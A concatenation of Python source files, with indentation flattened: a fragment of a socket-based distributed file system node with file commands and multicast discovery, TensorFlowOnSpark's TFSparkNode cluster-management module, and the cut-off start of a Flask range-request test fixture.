if('%' not in path[:1]):
path='%'+path
try:
ret_msg =('_'*40+'\n' +Path(RootDir+"/"+path).read_text()+'_'*40)
except Exception as e:
ret_msg = str(e)
else:
servid = fileLocator(path, -1)
#serverlist[port].fd.sendall(('give'+path).encode())
#ret_msg ='_'*40+'\n' + Q.get()+'\n'+'_'*40
ret_msg = 'con'+servid
#serverlist[servid].fd.sendall('con'#getpeername()[0]
elif cmd[:5] == 'writ ':
fil_path = cmd[5:]
tpath = '%' + fil_path.replace('/','%')
exe_str = cmd[-(len(fil_path)-(fil_path.rfind('.'))):]
extensions = ['.txt','.c','.py']
ret_msg = 'wr'+tpath+';'
if not(any(x in exe_str for x in extensions)):
ret_msg ='File Cannot Be Opened'
elif not(fileExists(fil_path)):
ret_msg ='File Does Not Exists'
elif (fileExistsLoc(fil_path)):
if(repExistsLoc(fil_path)):
fil_path =fil_path.replace('/','%')
if('%' not in fil_path[:1]):
fil_path='%'+fil_path
try:
ret_msg+= (Path(RootDir+"/"+fil_path).read_text() +'Āā')
except Exception as e:
ret_msg = str(e)
else:
servid = fileLocator(fil_path, -1)
#serverlist[port].fd.sendall(('give'+fil_path).encode())
#ret_msg+= (Q.get()+'Āā')
ret_msg = 'con'+servid
#serverlist[servid].fd.sendall('con'#getpeername()[0]
elif cmd[:5] == 'updt ':
fil_path = cmd[5:cmd.find(';')].replace('%','/')
fil_path = fil_path[1:]
if (not fileExists(fil_path)):
ret_msg='File Does not Exists'
elif (fileExistsLoc(fil_path)):
name = RootDir+'/'+fil_path
if(repExistsLoc(fil_path)):
fil_path =fil_path.replace('/','%')
if('%' not in fil_path[:1]):
name = RootDir+'/%'+fil_path
try:
with open(name,'w') as f:
f.write(cmd[cmd.find(';')+1:])
ret_msg = 'Written To File'
att =int( localfilelist[locFileLocator(fil_path)][1])+1
localfilelist[locFileLocator(fil_path)][1] = str(att)
xattr.setxattr(name, 'user.comment', str(att))
#broadcast(('ver_up'+str(att)+';/'+fil_path+'Ĕ').encode())
serv = fileLocator(fil_path, SERVER_PORT)
if(serv!=-1):
if(int(serverlist[serv].filelist[custFileLocator(serv, fil_path)][1]) < att):
serverlist[serv].fd.sendall(('ver_up'+str(att)+';/'+fil_path+'Ĕ'+cmd+'Āā'+'Ĕ').encode())
except Exception as e:
ret_msg = str(e)
else:
serverlist[fileLocator(fil_path,-1)].fd.sendall((cmd+'Āā').encode())
ret_msg = 'Written To File'
elif cmd[:5] == 'make ':
if (fileExists(cmd[5:])):
ret_msg='File Already Exists'
else:
cost = len(localfilelist)
serv = SERVER_PORT
if(cmd.rfind('/')!=-1):
if (fileExistsLoc(cmd[5:cmd.rfind('/')])):
cost=0
elif fileExists(cmd[5:cmd.rfind('/')]):
cost=0
serv = fileLocator(cmd[5:cmd.rfind('/')],-1)
if cost !=0:
serv = costCreationFunc(cost,0)
if(serv==SERVER_PORT):
flag = True
ret_msg ='File Created'
try:
file1 = open(RootDir+"/"+cmd[5:],'w+')
file1.close()
except IsADirectoryError:
os.makedirs(RootDir+"/"+cmd[5:cmd.rfind('/')])
flag = False
ret_msg = 'Directory Created'
except FileNotFoundError:
os.makedirs(RootDir+"/"+cmd[5:cmd.rfind('/')])
file1 = open(RootDir+"/"+cmd[5:],'w+')
file1.close()
broadcast(('dir_ap'+"/"+cmd[5:]+'Ĕ').encode())
if(flag):
lock.acquire()
localfilelist.append(["/"+cmd[5:],str(0)])
lock.release()
xattr.setxattr(RootDir+"/"+cmd[5:],"user.comment", str(0))
if(DFSOnline!=0):
replic_serv = costCreationFunc(9999,SERVER_PORT)
serverlist[replic_serv].fd.sendall(('rep%'+cmd[5:].replace('/','%')).encode())
else:
lock.acquire()
localfilelist.append(["/"+cmd[5:],str(-1)])
lock.release()
else:
serverlist[serv].fd.sendall((cmd).encode())
ret_msg ='File Created'
elif cmd[:5] == 'remv ':
fil_path = cmd[5:]
if not(fileExists(fil_path)):
ret_msg ='File Does Not Exists'
else:
ret_msg ='File Deleted'
if (fileExistsLoc(fil_path)):
name = fil_path
if(repExistsLoc(fil_path)):
fil_path ='%'+fil_path.replace('/','%')
if('/' not in fil_path):
fil_path = '/'+fil_path
if(cmd[-1:]!='/'):
os.remove(RootDir+fil_path)
else:
try:
os.rmdir(RootDir+"/"+cmd[5:-1])
ret_msg = "Directory Deleted"
except OSError:
ret_msg = "To Delete Non-empty Directories, use rmdr"
lock.acquire()
del localfilelist[locFileLocator(name)]
lock.release()
broadcast(('dir_dl'+name+'Ĕ').encode())
serv = fileLocator(name, SERVER_PORT)
if(serv!=-1):
serverlist[serv].fd.sendall((cmd+'Ĕ').encode())
else:
serverlist[fileLocator(fil_path, -1)].fd.sendall((cmd).encode())
elif cmd[:5] == 'rmdr ':
if not(fileExists(cmd[5:])):
ret_msg ='Directory Does Not Exists'
else:
ret_msg ='Directory Deleted'
if (fileExistsLoc(cmd[5:])):
shutil.rmtree((RootDir+"/"+cmd[5:]))
lock.acquire()
generateList()
lock.release()
broadcast(('dir_up'+repr(localfilelist)).encode())
else:
serverlist[fileLocator(cmd[5:], -1)].fd.sendall((cmd).encode())
elif cmd[:5] == 'apen ':
text = cmd.split(' ',2)
exe_str = cmd[(text[1]).rfind('.'):]
extensions = ['.txt','.c','.py']
if not(any(x in exe_str for x in extensions)):
ret_msg ='File not readable'
elif not(fileExists(text[1])):
ret_msg ='File Does Not Exists'
elif (fileExistsLoc(text[1])):
try:
with open("root/"+text[1], 'a+') as f:
f.write(text[2]+'\n')
ret_msg = 'appended to file'
except Exception as e:
ret_msg = str(e)
else:
serv = fileLocator(text[1], -1)
serverlist[serv].fd.sendall((cmd).encode())
ret_msg = 'appended to file'
elif cmd[:5] == "open ":
path = cmd[5:]
exe_str = cmd[-(len(path)-(path.rfind('.'))):]
extensions = ['.txt','.c','.py']
if not(any(x in exe_str for x in extensions)):
ret_msg ='File Cannot Be Opened'
elif not(fileExists(path)):
ret_msg ='File Does Not Exists'
elif (fileExistsLoc(path)):
if(os.fork()==0):
ret_msg = 'File Opened'
os.execvp('gedit',['gedit', './'+RootDir+'/'+path])
else:
serv = fileLocator(path, -1)
serverlist[serv].fd.sendall(('give'+path).encode())
ret_msg = 'File Opened'
if path.rfind('/') !=-1:
tpath = '%'+path.replace('/', '%')#path[path.rfind('/')+1:]
else:
tpath = '%'+path
with open(tpath, 'x') as f:
f.write(Q.get())
ret_msg = 'File Opened'
if(os.fork()==0):
os.execvp('gedit',['gedit', tpath])
elif cmd == 'cons':
ret_msg ='_'*40
for servers in serverlist:
if serverlist[servers].fd!=None:
ret_msg +='\n'+repr(serverlist[servers].fd) + ' ' +str(servers)
ret_msg +='_'*40
elif cmd[:5] == 'exis ':
if (fileExists(cmd[5:])):
ret_msg = 'File Present'
else:
ret_msg = 'File Absent'
#elif cmd == 'repl':
# for serports in serverlist:
# ret_msg += repr(serverlist[serports].replicalist)
elif ('help'in cmd or 'cmd' in cmd):
ret_msg ='_'*30 + "\nList Of Possible Commands:\n" + '-'*30+"\npeek View File Directory ..\ncons View Connections ..\nmake [file] ..\nremv [file] ..\nexis [file] ..\nread [file] ..\nwrit [file] ..\nupdt [file] ..\nexit Close Program ..\n"+'-'*30 #\napen [file] [text] ..
else:
ret_msg ='Invalid Command. Use help.'
return ('\n' + ret_msg)
def recServMsg(fd):
while(True):
data = fd.recv(MAX_MSG).decode()
serv = 0
for server in serverlist:
if serverlist[server].fd == fd:
serv = server
break
if len(data) >0:
print('\nMsg Recieved from Server: ', serv,' : ',data, '\n<cmd>: ', end='',flush=True)
all_data = data.split('Ĕ')
for data in all_data:
if(len(data)<1):
continue
if data[:6] == 'dir_up':
serverlist[serv].filelist = ast.literal_eval(data[6:])
elif data[:6] == 'dir_ap':
serverlist[serv].filelist.append([data[6:], str(0)])
elif data[:6] == 'dir_dl':
for files in serverlist[serv].filelist:
if data[6:] == files[0]:
serverlist[serv].filelist.remove(files)
break
elif data[:6] == 'ver_up':
data = data.split(';')
serverlist[serv].filelist[custFileLocator(serv, data[1])][1] = data[0][6:]
elif data[:4] == 'rep%':
file1 = open(RootDir+"/"+data[3:],'w+')
file1.close()
fname = data[3:].replace('%','/')
xattr.setxattr(RootDir+"/"+data[3:],"user.comment", str(0))
lock.acquire()
localfilelist.append([fname, str(0)])
localreplicalist.append(fname)
lock.release()
broadcast(('dir_ap'+fname).encode())
elif data[:4] == 'give':
try:
file_content = Path("root/"+data[4:]).read_text()
fd.sendall(('fil_msg'+';'+file_content+'Āā').encode())
except Exception as e:
fd.sendall(e.args[1].encode())
elif(data[:5] == 'updt '):
while(data[-2:]!='Āā'):
data +=fd.recv(MAX_MSG).decode()
reply = cmdParse(data[:-2])
fd.sendall(reply.encode())
elif(data[:6] == 'fil_up'):
file_data = data.split(';')
while(file_data[2][-2:]!='Āā'):
file_data[2] += fd.recv(MAX_MSG).decode()
fil_path = file_data[0][6:]
name = RootDir+"/"+fil_path
if(repExistsLoc(fil_path)):
name = RootDir+ '/'+fil_path.replace('/','%')
with open(name,'w') as f:
f.write(file_data[2][:-2])
localfilelist[locFileLocator(fil_path)][1] = file_data[1]
xattr.setxattr(name, 'user.comment', file_data[1])
elif data[:7] == 'fil_msg':
file_data = data.split(';')
while(file_data[1][-2:]!='Āā'):
file_data[1] += fd.recv(MAX_MSG).decode()
Q.put(file_data[1][:-2])
#print(result + '\n<cmd>: ', end='',flush=True)
elif data[:3] == 'con':
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((data[3:], CLIENT_PORT))
clientlist.append(client)
#print(clientlist)
print('\nIncoming Client Connection:', data[3:],'\n<cmd>: ', end='',flush=True)
threading.Thread(target=recCliMsg, kwargs={'fd':client}).start()
elif data[:4] == 'apen':
cmdParse(data)
elif data[:5] == 'remv ':
print(cmdParse(data))
elif data[:5] == 'make ':
print(cmdParse(data))
else:
print('\nTerminating Connection:', serv,fd.getpeername(),'\n<cmd>: ', end='',flush=True)
fd.close()
serverlist[serv].fd = None
serverlist[serv].filelist = None
global DFSOnline
DFSOnline-=1
break
def recCliMsg(fd):
while(True):
data = (fd.recv(MAX_MSG)).decode()
if len(data) >0:
print('\nMsg Recieved from Client: ', repr(fd.getpeername()),' : ',data, '\n<cmd>: ', end='',flush=True)
if(data[:5] == 'updt '):
while(data[-2:]!='Āā'):
data +=fd.recv(MAX_MSG).decode()
data = data[:-2]
reply = cmdParse(data)
if(reply[1:4] == 'con'):
fd.sendall(reply[:4].encode())
serverlist[reply[4:]].fd.sendall(('con'+fd.getpeername()[0]).encode())
else:
fd.sendall(reply.encode())
else:
print('\nTerminating Connection with Client:', fd.getpeername(),'\n<cmd>: ', end='',flush=True)
clientlist.remove(fd)
fd.close()
break
def multiCast():#listening on multicast group
global DFSOnline
server_address = ('', 50000)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(server_address)
group = socket.inet_aton('224.4.255.255')
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
print('\nwaiting to receive multicast message')
while True:
data, address = sock.recvfrom(4)
if(data.decode() == 'cli'):
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
cli.connect((address[0], CLIENT_PORT))
except:
continue
else:
clientlist.append(cli)
#print(clientlist)
print('\nIncoming Client Connection:', address,'\n<cmd>: ', end='',flush=True)
threading.Thread(target=recCliMsg, kwargs={'fd':cli}).start()
elif(data.decode() == 'ser'):
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.connect((address[0],SERVER_PORT))
data = serv.recv(MAX_MSG).decode()
serverlist[address[0]] = serverContents()
while(data[-2:]!='Āā'):
data +=serv.recv(MAX_MSG).decode()
serverlist[address[0]].fd= serv
serv.sendall((repr(localfilelist)+'Āā').encode())#+';'+repr(localreplicalist)
lock.acquire()
DFSOnline+=1
serverlist[address[0]].filelist = ast.literal_eval(data[:-2])
syncFiles(address[0])
lock.release()
print('\nIncoming Server Connection:', address,'\n<cmd>: ', end='',flush=True)
threading.Thread(target=recServMsg, kwargs={'fd':serv}).start()
def sockListen(sockfd):
global DFSOnline
sockfd.listen()
while(True):
conn, addr = sockfd.accept()
serverlist[addr[0]] = serverContents()
serverlist[addr[0]].fd = conn
print('Connected to Server: ', addr)
conn.sendall((repr(localfilelist)+'Āā').encode())
data = conn.recv(MAX_MSG).decode()
while(data[-2:]!='Āā'):
data +=conn.recv(MAX_MSG).decode()
lock.acquire()
DFSOnline+=1
serverlist[addr[0]].filelist = ast.literal_eval(data[:-2])
syncFiles(addr[0])
lock.release()
t = threading.Thread(target=recServMsg, kwargs={'fd':conn})
#t.daemon = True
t.start()
def main():
print(locname)
serverlist[locname]=serverContents()
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.bind(('', SERVER_PORT))
generateList()
serverlist[locname].fd=serv
t = threading.Thread(target=sockListen, kwargs={"sockfd": serv})
t.daemon = True
t.start()
#-----------------------------------------------------------
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(0.5)
ttl = struct.pack('b', 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
sent = sock.sendto(b'ser', ('224.4.255.255', 50000))
#----------------------------------------------------------
mtc = threading.Thread(target = multiCast)
mtc.daemon = True
mtc.start()
while(True):
cmd=input('<cmd>: ')
if(cmd=='close' or cmd == 'exit'):
sys.exit()
print(cmdParse(cmd))
if __name__ == "__main__":
main()
|
TFSparkNode.py | # Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""This module provides low-level functions for managing the TensorFlowOnSpark cluster."""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import json
import logging
import multiprocessing
import os
import platform
import socket
import subprocess
import sys
import uuid
import time
import traceback
from threading import Thread
from . import TFManager
from . import TFNode
from . import gpu_info
from . import marker
from . import reservation
from . import util
class TFNodeContext:
"""Encapsulates unique metadata for a TensorFlowOnSpark node/executor and provides methods to interact with Spark and HDFS.
An instance of this object will be passed to the TensorFlow "main" function via the `ctx` argument.
To simply the end-user API, this class now mirrors the functions of the TFNode module.
Args:
:executor_id: integer identifier for this executor, per ``nodeRDD = sc.parallelize(range(num_executors), num_executors).``
:job_name: TensorFlow job name (e.g. 'ps' or 'worker') of this TF node, per cluster_spec.
:task_index: integer rank per job_name, e.g. "worker:0", "worker:1", "ps:0".
:cluster_spec: dictionary for constructing a tf.train.ClusterSpec.
:defaultFS: string representation of default FileSystem, e.g. ``file://`` or ``hdfs://<namenode>:8020/``.
:working_dir: the current working directory for local filesystems, or YARN containers.
:mgr: TFManager instance for this Python worker.
"""
def __init__(self, executor_id, job_name, task_index, cluster_spec, defaultFS, working_dir, mgr):
self.worker_num = executor_id # for backwards-compatibility
self.executor_id = executor_id
self.job_name = job_name
self.task_index = task_index
self.cluster_spec = cluster_spec
self.defaultFS = defaultFS
self.working_dir = working_dir
self.mgr = mgr
def absolute_path(self, path):
"""Convenience function to access ``TFNode.hdfs_path`` directly from this object instance."""
return TFNode.hdfs_path(self, path)
def start_cluster_server(self, num_gpus=1, rdma=False):
"""Convenience function to access ``TFNode.start_cluster_server`` directly from this object instance."""
return TFNode.start_cluster_server(self, num_gpus, rdma)
def export_saved_model(self, sess, export_dir, tag_set, signatures):
"""Convenience function to access ``TFNode.export_saved_model`` directly from this object instance."""
TFNode.export_saved_model(sess, export_dir, tag_set, signatures)
def get_data_feed(self, train_mode=True, qname_in='input', qname_out='output', input_mapping=None):
"""Convenience function to access ``TFNode.DataFeed`` directly from this object instance."""
return TFNode.DataFeed(self.mgr, train_mode, qname_in, qname_out, input_mapping)
class TFSparkNode(object):
"""Low-level functions used by the high-level TFCluster APIs to manage cluster state.
**This class is not intended for end-users (see TFNode for end-user APIs)**.
For cluster management, this wraps the per-node cluster logic as Spark RDD mapPartitions functions, where the RDD is expected to be
a "nodeRDD" of the form: ``nodeRDD = sc.parallelize(range(num_executors), num_executors)``.
For data feeding, this wraps the feeding logic as Spark RDD mapPartitions functions on a standard "dataRDD".
This also manages a reference to the TFManager "singleton" per executor. Since Spark can spawn more than one python-worker
per executor, this will reconnect to the "singleton" instance as needed.
"""
mgr = None #: TFManager instance
cluster_id = None #: Unique ID for a given TensorFlowOnSpark cluster, used for invalidating state for new clusters.
def _get_manager(cluster_info, host, executor_id):
"""Returns this executor's "singleton" instance of the multiprocessing.Manager, reconnecting per python-worker if needed.
Args:
:cluster_info: cluster node reservations
:host: host IP address
:executor_id: unique id per executor (created during initial call to run())
Returns:
TFManager instance for this executor/python-worker
"""
for node in cluster_info:
if node['host'] == host and node['executor_id'] == executor_id:
addr = node['addr']
authkey = node['authkey']
TFSparkNode.mgr = TFManager.connect(addr, authkey)
break
if TFSparkNode.mgr is None:
msg = "No TFManager found on this node, please ensure that:\n" + \
"1. Spark num_executors matches TensorFlow cluster_size\n" + \
"2. Spark cores/tasks per executor is 1.\n" + \
"3. Spark dynamic allocation is disabled."
raise Exception(msg)
logging.info("Connected to TFSparkNode.mgr on {0}, executor={1}, state={2}".format(host, executor_id, str(TFSparkNode.mgr.get('state'))))
return TFSparkNode.mgr
def run(fn, tf_args, cluster_meta, tensorboard, log_dir, queues, background):
"""Wraps the user-provided TensorFlow main function in a Spark mapPartitions function.
Args:
:fn: TensorFlow "main" function provided by the user.
:tf_args: ``argparse`` args, or command line ``ARGV``. These will be passed to the ``fn``.
:cluster_meta: dictionary of cluster metadata (e.g. cluster_id, reservation.Server address, etc).
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:queues: *INTERNAL_USE*
:background: boolean indicating if the TensorFlow "main" function should be run in a background process.
Returns:
A nodeRDD.mapPartitions() function.
"""
def _mapfn(iter):
import tensorflow as tf
# Note: consuming the input iterator helps Pyspark re-use this worker,
for i in iter:
executor_id = i
# run quick check of GPU infrastructure if using tensorflow-gpu
if tf.test.is_built_with_cuda():
gpus_to_use = gpu_info.get_gpus(num_gpu=1)
# assign TF job/task based on provided cluster_spec template (or use default/null values)
job_name = 'default'
task_index = -1
cluster_id = cluster_meta['id']
cluster_template = cluster_meta['cluster_template']
for jobtype in cluster_template:
nodes = cluster_template[jobtype]
if executor_id in nodes:
job_name = jobtype
task_index = nodes.index(executor_id)
break
# get unique key (hostname, executor_id) for this executor
host = util.get_ip_address()
util.write_executor_id(executor_id)
port = 0
# check for existing TFManagers
if TFSparkNode.mgr is not None and str(TFSparkNode.mgr.get('state')) != "'stopped'":
if TFSparkNode.cluster_id == cluster_id:
# raise an exception to force Spark to retry this "reservation" task on another executor
raise Exception("TFManager already started on {0}, executor={1}, state={2}".format(host, executor_id, str(TFSparkNode.mgr.get("state"))))
else:
# old state, just continue with creating new manager
logging.warn("Ignoring old TFManager with cluster_id {0}, requested cluster_id {1}".format(TFSparkNode.cluster_id, cluster_id))
# start a TFManager and get a free port
# use a random uuid as the authkey
authkey = uuid.uuid4().bytes
addr = None
if job_name == 'ps':
# PS nodes must be remotely accessible in order to shutdown from Spark driver.
TFSparkNode.mgr = TFManager.start(authkey, ['control', 'error'], 'remote')
addr = (host, TFSparkNode.mgr.address[1])
else:
# worker nodes only need to be locally accessible within the executor for data feeding
TFSparkNode.mgr = TFManager.start(authkey, queues)
addr = TFSparkNode.mgr.address
# initialize mgr state
TFSparkNode.mgr.set('state', 'running')
TFSparkNode.cluster_id = cluster_id
# expand Hadoop classpath wildcards for JNI (Spark 2.x)
if 'HADOOP_PREFIX' in os.environ:
classpath = os.environ['CLASSPATH']
hadoop_path = os.path.join(os.environ['HADOOP_PREFIX'], 'bin', 'hadoop')
hadoop_classpath = subprocess.check_output([hadoop_path, 'classpath', '--glob']).decode()
logging.debug("CLASSPATH: {0}".format(hadoop_classpath))
os.environ['CLASSPATH'] = classpath + os.pathsep + hadoop_classpath
# start TensorBoard if requested
tb_pid = 0
tb_port = 0
if tensorboard and job_name == 'worker' and task_index == 0:
tb_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tb_sock.bind(('', 0))
tb_port = tb_sock.getsockname()[1]
tb_sock.close()
logdir = log_dir if log_dir else "tensorboard_%d" % executor_id
# search for tensorboard in python/bin, PATH, and PYTHONPATH
pypath = sys.executable
pydir = os.path.dirname(pypath)
search_path = os.pathsep.join([pydir, os.environ['PATH'], os.environ['PYTHONPATH']])
tb_path = util.find_in_path(search_path, 'tensorboard') # executable in PATH
if not tb_path:
tb_path = util.find_in_path(search_path, 'tensorboard/main.py') # TF 1.3+
if not tb_path:
tb_path = util.find_in_path(search_path, 'tensorflow/tensorboard/__main__.py') # TF 1.2-
if not tb_path:
raise Exception("Unable to find 'tensorboard' in: {}".format(search_path))
# launch tensorboard
tb_proc = subprocess.Popen([pypath, tb_path, "--logdir=%s" % logdir, "--port=%d" % tb_port], env=os.environ)
tb_pid = tb_proc.pid
# check server to see if this task is being retried (i.e. already reserved)
client = reservation.Client(cluster_meta['server_addr'])
cluster_info = client.get_reservations()
tmp_sock = None
node_meta = None
for node in cluster_info:
(nhost, nexec) = (node['host'], node['executor_id'])
if nhost == host and nexec == executor_id:
node_meta = node
port = node['port']
# if not already done, register everything we need to set up the cluster
if node_meta is None:
# first, find a free port for TF
tmp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tmp_sock.bind(('', port))
port = tmp_sock.getsockname()[1]
node_meta = {
'executor_id': executor_id,
'host': host,
'job_name': job_name,
'task_index': task_index,
'port': port,
'tb_pid': tb_pid,
'tb_port': tb_port,
'addr': addr,
'authkey': authkey
}
# register node metadata with server
logging.info("TFSparkNode.reserve: {0}".format(node_meta))
client.register(node_meta)
# wait for other nodes to finish reservations
cluster_info = client.await_reservations()
client.close()
# construct a TensorFlow clusterspec from cluster_info
sorted_cluster_info = sorted(cluster_info, key=lambda k: k['executor_id'])
spec = {}
last_executor_id = -1
for node in sorted_cluster_info:
if (node['executor_id'] == last_executor_id):
raise Exception("Duplicate worker/task in cluster_info")
last_executor_id = node['executor_id']
logging.info("node: {0}".format(node))
(njob, nhost, nport) = (node['job_name'], node['host'], node['port'])
hosts = [] if njob not in spec else spec[njob]
hosts.append("{0}:{1}".format(nhost, nport))
spec[njob] = hosts
# update TF_CONFIG and reserve GPU for tf.estimator based code
# Note: this will execute but be ignored by non-tf.estimator code
tf_config = json.dumps({
'cluster': spec,
'task': {'type': job_name, 'index': task_index},
'environment': 'cloud'
})
os.environ['TF_CONFIG'] = tf_config
if tf.test.is_built_with_cuda():
num_gpus = tf_args.num_gpus if 'num_gpus' in tf_args else 1
gpus_to_use = gpu_info.get_gpus(num_gpu=num_gpus, executor_id=executor_id)
gpu_str = "GPUs" if num_gpus > 1 else "GPU"
logging.debug("Requested {} {}, setting CUDA_VISIBLE_DEVICES={}".format(num_gpus, gpu_str, gpus_to_use))
os.environ['CUDA_VISIBLE_DEVICES'] = gpus_to_use
# create a context object to hold metadata for TF
ctx = TFNodeContext(executor_id, job_name, task_index, spec, cluster_meta['default_fs'], cluster_meta['working_dir'], TFSparkNode.mgr)
# release port reserved for TF as late as possible
if tmp_sock is not None:
tmp_sock.close()
# Background mode relies reuse of python worker in Spark.
if background:
# However, reuse of python worker can't work on Windows, we need to check if the current
# script runs on Windows or not.
if os.name == 'nt' or platform.system() == 'Windows':
raise Exception("Background mode is not supported on Windows.")
# Check if the config of reuse python worker is enabled on Spark.
if not os.environ.get("SPARK_REUSE_WORKER"):
raise Exception("Background mode relies reuse of python worker on Spark. This config 'spark.python.worker.reuse' is not enabled on Spark. Please enable it before using background.")
def wrapper_fn(args, context):
"""Wrapper function that sets the sys.argv of the executor."""
if isinstance(args, list):
sys.argv = args
fn(args, context)
def wrapper_fn_background(args, context):
"""Wrapper function that signals exceptions to foreground process."""
errq = TFSparkNode.mgr.get_queue('error')
try:
wrapper_fn(args, context)
except Exception:
errq.put(traceback.format_exc())
errq.join()
if job_name == 'ps' or background:
# invoke the TensorFlow main function in a background thread
logging.info("Starting TensorFlow {0}:{1} as {2} on cluster node {3} on background process".format(
job_name, task_index, job_name, executor_id))
p = multiprocessing.Process(target=wrapper_fn_background, args=(tf_args, ctx))
if job_name == 'ps':
p.daemon = True
p.start()
# for ps nodes only, wait indefinitely in foreground thread for a "control" event (None == "stop")
if job_name == 'ps':
queue = TFSparkNode.mgr.get_queue('control')
equeue = TFSparkNode.mgr.get_queue('error')
done = False
while not done:
while (queue.empty() and equeue.empty()):
time.sleep(1)
if (not equeue.empty()):
e_str = equeue.get()
equeue.task_done()
raise Exception("exception in ps:\n" + e_str)
msg = queue.get(block=True)
logging.info("Got msg: {0}".format(msg))
if msg is None:
logging.info("Terminating PS")
TFSparkNode.mgr.set('state', 'stopped')
done = True
queue.task_done()
else:
# otherwise, just run TF function in the main executor/worker thread
logging.info("Starting TensorFlow {0}:{1} on cluster node {2} on foreground thread".format(job_name, task_index, executor_id))
wrapper_fn(tf_args, ctx)
logging.info("Finished TensorFlow {0}:{1} on cluster node {2}".format(job_name, task_index, executor_id))
return _mapfn
def train(cluster_info, cluster_meta, qname='input'):
"""Feeds Spark partitions into the shared multiprocessing.Queue.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc)
:cluster_meta: dictionary of cluster metadata (e.g. cluster_id, reservation.Server address, etc)
:qname: *INTERNAL_USE*
Returns:
A dataRDD.mapPartitions() function
"""
def _train(iter):
# get shared queue, reconnecting if necessary
mgr = _get_manager(cluster_info, util.get_ip_address(), util.read_executor_id())
try:
queue = mgr.get_queue(qname)
equeue = mgr.get_queue('error')
except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(qname)
raise Exception(msg)
state = str(mgr.get('state'))
logging.info("mgr.state={0}".format(state))
terminating = state == "'terminating'"
if terminating:
logging.info("mgr is terminating, skipping partition")
count = 0
for item in iter:
count += 1
logging.info("Skipped {0} items from partition".format(count))
else:
logging.info("Feeding partition {0} into {1} queue {2}".format(iter, qname, queue))
count = 0
for item in iter:
count += 1
queue.put(item, block=True)
# wait for consumers to finish processing all items in queue before "finishing" this iterator
joinThr = Thread(target=queue.join)
joinThr.start()
while (joinThr.isAlive()):
if (not equeue.empty()):
e_str = equeue.get()
equeue.task_done()
raise Exception("exception in worker:\n" + e_str)
time.sleep(1)
# queue.join()
logging.info("Processed {0} items in partition".format(count))
# check if TF is terminating feed after this partition
state = str(mgr.get('state'))
terminating = state == "'terminating'"
if terminating:
try:
logging.info("TFSparkNode: requesting stop")
client = reservation.Client(cluster_meta['server_addr'])
client.request_stop()
client.close()
except Exception as e:
# ignore any errors while requesting stop
logging.debug("Error while requesting stop: {0}".format(e))
return [terminating]
return _train
def inference(cluster_info, qname='input'):
"""Feeds Spark partitions into the shared multiprocessing.Queue and returns inference results.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc)
:qname: *INTERNAL_USE*
Returns:
A dataRDD.mapPartitions() function
"""
def _inference(iter):
# get shared queue, reconnecting if necessary
mgr = _get_manager(cluster_info, util.get_ip_address(), util.read_executor_id())
try:
queue_in = mgr.get_queue(qname)
equeue = mgr.get_queue('error')
except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(qname)
raise Exception(msg)
logging.info("Feeding partition {0} into {1} queue {2}".format(iter, qname, queue_in))
count = 0
for item in iter:
count += 1
queue_in.put(item, block=True)
# signal "end of partition"
queue_in.put(marker.EndPartition())
# skip empty partitions
if count == 0:
return []
# wait for consumers to finish processing all items in queue before "finishing" this iterator
joinThr = Thread(target=queue_in.join)
joinThr.start()
while (joinThr.isAlive()):
if (not equeue.empty()):
e_str = equeue.get()
equeue.task_done()
raise Exception("exception in worker:\n" + e_str)
time.sleep(1)
logging.info("Processed {0} items in partition".format(count))
# read result queue
results = []
queue_out = mgr.get_queue('output')
while count > 0:
result = queue_out.get(block=True)
results.append(result)
count -= 1
queue_out.task_done()
logging.info("Finished processing partition")
return results
return _inference
def shutdown(cluster_info, queues=['input']):
"""Stops all TensorFlow nodes by feeding ``None`` into the multiprocessing.Queues.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc).
:queues: *INTERNAL_USE*
Returns:
A nodeRDD.mapPartitions() function
"""
def _shutdown(iter):
host = util.get_ip_address()
executor_id = util.read_executor_id()
# reconnect to shared queue
mgr = _get_manager(cluster_info, host, executor_id)
# send SIGTERM to Tensorboard proc (if running)
for node in cluster_info:
if node['host'] == host and node['executor_id'] == executor_id:
tb_pid = node['tb_pid']
if tb_pid != 0:
logging.info("Stopping tensorboard (pid={0})".format(tb_pid))
subprocess.Popen(["kill", str(tb_pid)])
# terminate any listening queues
logging.info("Stopping all queues")
for q in queues:
try:
queue = mgr.get_queue(q)
logging.info("Feeding None into {0} queue".format(q))
queue.put(None, block=True)
except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(q)
raise Exception(msg)
logging.info("Setting mgr.state to 'stopped'")
mgr.set('state', 'stopped')
return [True]
return _shutdown
|
conftest.py | import pytest
import socket
import time
from urllib.request import urlopen
from flask import Flask
from multiprocessing import Process
from os import path
from flask_rangerequest import RangeRequest
class Server:
def __init__(self) -> None:
self.app = Flask(__name__)
self.dummy_file = DummyFile()
@self.app.route('/', methods=('GET', 'POST'))
def index():
return RangeRequest(self.dummy_file.contents).make_response()
class DummyFile:
def __init__(self) -> None:
self.full_path = path.join(path.dirname(__file__), '..', 'README.md')
with open(self.full_path, 'rb') as f:
